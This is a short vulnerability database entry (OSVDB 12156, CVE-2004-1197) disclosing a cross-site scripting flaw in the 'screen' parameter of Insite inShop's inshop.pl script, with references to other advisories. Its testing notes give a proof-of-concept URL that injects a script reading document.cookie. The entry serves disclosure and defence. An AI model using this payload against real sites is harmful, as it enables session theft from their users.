Insite inShop inshop.pl screen Variable XSS

2004-11-24T07:03:42
ID OSVDB:12156
Type osvdb
Reporter OSVDB
Modified 2004-11-24T07:03:42

Description

Manual Testing Notes

http://[victim]/mod_perl/inshop.pl?screen=<script>alert(document.cookie);</script>

References:

Vendor URL: http://inshop.insite.com.br/ Secunia Advisory ID:13188 Related OSVDB ID: 12155 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0334.html ISS X-Force ID: 18268 CVE-2004-1197